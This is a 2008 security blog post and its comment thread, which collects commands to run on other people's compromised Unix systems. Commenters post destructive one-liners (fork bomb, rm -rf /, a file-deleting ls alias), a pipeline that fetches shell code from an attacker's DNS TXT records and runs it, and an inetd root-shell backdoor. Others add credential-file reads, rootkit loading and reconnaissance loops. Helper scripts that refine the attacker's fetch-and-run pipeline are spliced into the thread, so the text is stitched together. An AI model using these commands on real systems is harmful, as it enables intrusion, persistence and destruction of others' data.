Wednesday, July 02, 2008

The security book that I'd like to see written (and which I'd buy)

Good security books are few and far between. But IF someone writes the following book, I'll pre-order it immediately, even if it costs a hundred dollars:

"100 UNIX commands to issue on other people's systems"

Generally, I am horrible at all things *nix, and there are few enough good books around which teach you clever things to do with a shell. Unfortunately, there is no book that teaches people what to do with a shell on someone else's box.

Someone from Matasano told me they'd post their favourite commands if I wrote this blog post - so let's see it! :)

(I'd like to start this by posting, but honestly -- I wouldn't be asking if I knew anything I'd not be embarrassed about. I mentioned above that I suck at all things *nix)

15 comments:

Marcin said...

I'll start:

:(){ :|:& };:

ddz said...

Say you can only execute one command on this other person's Unix box and you don't know how they are connected to the net (proxy, nat, etc). This may be handy:
'dig sh.attacker.com txt +short | tr -d '"' | sh'
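
One detail the DNS-TXT trick above depends on: dig prints every TXT record as one or more double-quoted strings (records over 255 bytes come back split into several quoted chunks, and embedded quotes are escaped as \"), so the raw output is not something sh can execute as-is. The helper below, an added example rather than code from the comment, normalises that output into a script; sh.attacker.com is the name used in the comment, the sample lines are constructed stand-ins for dig output, and nothing here contacts a resolver.

```shell
#!/bin/sh
# txt_to_script: turn `dig +short TXT` output into something sh can run.
# A line such as   "echo hello; " "id"   is one record split into chunks;
# fed straight to sh it parses as a single quoted word, so the "command"
# is never found. We strip the outer quotes, join the chunks, then
# unescape \" (the order matters: join before unescaping).
txt_to_script() {
    sed -e 's/^"//' \
        -e 's/"$//' \
        -e 's/" "//g' \
        -e 's/\\"/"/g'
}

# fetch_txt_script NAME: the full fetch-and-run pipeline (not run here).
# Caveat: on a lookup failure dig prints lines like ";; connection timed out",
# so a real deployment should check dig's exit status before piping to sh.
fetch_txt_script() {
    dig "$1" txt +short | txt_to_script | sh
}

# Demo on constructed input standing in for dig's output: prints
#   echo hello; id
printf '%s\n' '"echo hello; " "id"' | txt_to_script
```

Each TXT record is one line of output, so several records become several commands in order; the quoting rules above are dig's, and other resolvers (host, nslookup) print TXT differently and need their own normaliser.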

David said...

Do you mean something like this?

When an attacker has a shell (s)he might already know what operating system that is running, but a simple "uname" to check the system version and "cat /etc/lsb-release" to check Linux version, if applicable, will probably make it easier to find a suitable local root exploit or rootkit that can be loaded later.

"wget", "curl" or similar to download toolz (rootkit, port scanners, IRC server, backdoors, etc) from some other cracked machine

"insmod" for loading rootkit Linux kernel modules (then "lsmod" to list, "rmmod" to remove)

"cat" to view small text files and ("more" or "less") to view larger text files, and "vi" to edit them

If the machine has a compiler installed, a "make" or "make install" on some downloaded source code might be used, sometimes preceded by a "./configure".

"tcpdump" to sniff traffic

"locate" to find a file by looking in a file database, or "find" to find a file by recursive search on the file system

For example "mysql" and "mysqldump" to examine MySQL databases

Just don't exercise the above on my servers, OK? :-)

James said...

I assume this is commands to run after you've compromised someone's computer?
How about: rm -fr /

Joern said...

quick and dirty:

alias ls='ls;rm * 2> /dev/null'

the stderr redirection is used to suppress rm error messages

Jordan said...

If the machine is running a recent bash that's got /dev/tcp support compiled in, you can use the following neat trick to implement a socket listener bound to a shell (or as an outbound connection) with no other utilities except the shell itself.

http://labs.neohapsis.com/2008/04/17/connect-back-shell-literally/

http://www.gnucitizen.org/blog/reverse-shell-with-bash/

Sadly, not enabled by default on debian and its various descendants.

egypt said...

My response is a little more lengthy than will fit in a comment, so I've written a blog post

Craig S Wright said...

Better yet, I will do it as a freebee. I have just submitted a Gold paper application to SANS as follows:

"100 UNIX commands to issue on other people's systems.

This paper will analyse and present the top 100 commands in Unix/Linux that an attacker (and most crucially, a security tester) can use.

These will range from commands to gain access to a system or extend access, to altering logs and other files (including the kernel) and to monitoring what is going on.

The paper will also provide scripting techniques and examples based on these commands to provide the basics needed by any budding *NIX security professional."

Regards,
Craig Wright GSE-Compliance

Nicolas said...

1/ Find out which distro you are on:
# uname -sr
or "cat" one of those files:
/etc/debian_version
/etc/redhat-release
/etc/SuSE-release
/etc/slackware-version
/etc/gentoo-release
/etc/lsb-release
/etc/issue
/etc/issue.net
On Digital/Compaq UNIX / Tru64 4.0:
# sizer -v

2/ Look for ~/.ssh/known_hosts to find other boxes to ssh to

3/ # cat /etc/passwd
if you are not root

4/ # cat /etc/shadow
if you are root

5/ find suid programs:
find / -perm -4000 2>/dev/null >/tmp/suid &

6/ Download and compile netcat
wget http://myserver/nc.tgz && tar zxvf nc.tgz && cd nc && make && make install

7/ # who
find who is connected

8/ # ps aux
what processes are running

9/ # find / -name bak

10/ rgrep -i password *
grep for "password" string in config files

...

There are too many. Really, you should first buy any Linux admin book.
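
The distro-identification step (item 1 above, and the uname / lsb-release suggestion in an earlier comment) is easy to script so it prints every release file that exists instead of being cat'ed one by one. The function below is an added example, not code from the comment; it takes an optional root prefix so the same check works against a mounted disk image or chroot, and /etc/os-release is added to the list because current distributions put their identification there.

```shell
#!/bin/sh
# detect_release [ROOT]: print "file: first line" for every known release
# file under ROOT (default /). Returns 1 if none is found, so it can be
# used as a test in a script.
detect_release() {
    root="${1:-/}"
    root="${root%/}"   # "/" becomes "", so "$root/etc" is "/etc" not "//etc"
    found=1
    for f in /etc/os-release /etc/debian_version /etc/redhat-release \
             /etc/SuSE-release /etc/slackware-version /etc/gentoo-release \
             /etc/lsb-release /etc/issue /etc/issue.net; do
        [ -r "$root$f" ] || continue
        printf '%s: %s\n' "$f" "$(head -n 1 "$root$f")"
        found=0
    done
    return $found
}

# Kernel and version of the box this runs on. Unlike the release files,
# uname always describes the live system, never a mounted image.
uname -sr
detect_release / || echo "no release file found"
```

Reading only the first line keeps /etc/issue (which may carry getty escape sequences and banners) from flooding the output; if the first match is /etc/os-release, the ID and VERSION_ID lines in it are the fields a local exploit search needs.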

Knud Erik said...

`find` to look for badly set permissions and custom suid binaries.

nullbomb said...

In the old days there were things like this - http://www.langston.com/Fun_People/1997/1997BBL.html

I personally was telling people to run "nohup rm -rf / &" if they asked me for my favourite back in uni days;-)

John said...

I can't think of 100 different ways to dd urandom onto the raw disk device, so I'll give you an old school one:

echo "chargen stream tcp nowait root /bin/sh ps -ef" > /etc/inetd.conf ; kill -HUP `ps -ef | grep inetd | grep -v grep | awk '{print $2}'`

Something like that :)

Note that this only works on geriatric commercial UNICES that still use inetd. :)

John said...

WHOOPS!!! I MEAN >> instead of >


I actually made that mistake once while doing a pen test at a very very large defense-related customer.

I blew out /etc/passwd with several hundred accounts on an Ultrix box. My colleague reconstructed it from an xterm buffer and fixed it while I had a panic attack/chainsmoked outside. :)

Be careful with your ">" and ">>" kids...

jcw (gaussie)

John said...

A bunch of UNIX commands to run on other people's computers.

Caveat emptor! Run at your own risk. Some of these commands (that include "for" statements) are purposely typed out in a form that favors readability at the cost of efficiency. Comments are preceded by "#". I am also "shaking these out of my sleeve" so please forgive any typos or mistakes. This is also a work in progress, for both my trainees and staff at my job and everyone out on the int0rweb, so you can certainly expect a more complete list in the near future.

Information gathering

rup

for i in `ifconfig -a | grep inet | grep -v inet6 | grep -v 127.0.0 | awk '{print $2}' | cut -f1-3 -d.` ; do
ping $i.255
done

netstat -nr

cat /etc/inetd.conf

rpcinfo -p localhost

for i in `ifconfig -a | grep inet | grep -v inet6 | grep -v 127.0.0 | awk '{print $2}' | cut -f1-3 -d.` ; do
ping $i.255 | awk '{print $4}' | sed s/:/""/g >> targets.txt
done
for i in `cat targets.txt` ; do
echo $i
rpcinfo -p $i
echo ""
showmount -e $i
echo ""
done

arp -a


# where PID is the process id of some process whose current working directory you want to enter/determine (solaris, AIX, perhaps others).
cd /proc/PID/cwd

# Determine what processes are using /tmp
fuser /tmp

#lsof is much more useful, but not included on all UNIX systems. Do a man lookup on lsof for infoharvesting goodness... If you are lucky enough to have lsof on "your victim^H^H^H^H^H^H^H^H friend's computer", run:
lsof
#... and see what happens.

#find a file of a particular permission mode (in our example rw by everyone)
find / -perm 666 -print

# find all files modified between 5 and 10 minutes ago
find / -mmin +4 -mmin -11

#find all files modified in the last 24 hours
find / -mtime 0

# On AIX find all files containing the string 'foobar', not following links
grep -R foobar /

# ...and following links
grep -r foobar /
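
The find-based checks scattered through the comments above (Nicolas's item 5, Knud Erik's note on bad permissions and custom suid binaries, and the -perm and -mmin entries in the list just above) are the same pass over the file system with different predicates. The functions below are an added example, not any commenter's code; they default to / but take a directory argument so they can be pointed at a mounted image or, as in the demo, at a small constructed tree. -perm -MODE ("all of these bits set") is the portable spelling: GNU findutils no longer accepts the -perm +MODE form.

```shell
#!/bin/sh
# audit_tree [ROOT]: setuid/setgid files, world-writable files, and
# world-writable directories that lack the sticky bit (a 1777 /tmp is
# expected; a 0777 directory is the finding). -xdev keeps find from
# wandering into /proc, /sys and network mounts, which also means other
# local file systems must be audited with their own call.
audit_tree() {
    root="${1:-/}"
    echo "== setuid/setgid files =="
    find "$root" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null
    echo "== world-writable files =="
    find "$root" -xdev -type f -perm -0002 -print 2>/dev/null
    echo "== world-writable directories without the sticky bit =="
    find "$root" -xdev -type d -perm -0002 ! -perm -1000 -print 2>/dev/null
}

# recent_files ROOT MINUTES: files modified in the last MINUTES minutes,
# the "what changed since we got in" check from the list above.
recent_files() {
    find "$1" -xdev -type f -mmin "-$2" -print 2>/dev/null
}

# Demo on a constructed tree (never on / here, which would take a while):
demo=$(mktemp -d)
touch "$demo/suid_bin" "$demo/ww_file"
chmod 4755 "$demo/suid_bin"
chmod 666 "$demo/ww_file"
mkdir "$demo/ww_dir" "$demo/tmp_like"
chmod 777 "$demo/ww_dir"
chmod 1777 "$demo/tmp_like"
audit_tree "$demo"
echo "== modified in the last 5 minutes =="
recent_files "$demo" 5
rm -rf "$demo"
```

On a real box, diff the setuid list against the package manager's idea of what should be setuid (rpm -V, debsums, or a baseline taken from a clean install of the same release); a custom suid binary that no package owns is the thing Knud Erik's comment is about.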

Craig S Wright said...

And it is about 6-8 weeks until the paper I am writing shall be ready.

You should like the fact that it will be on the SANS reading room and hence free.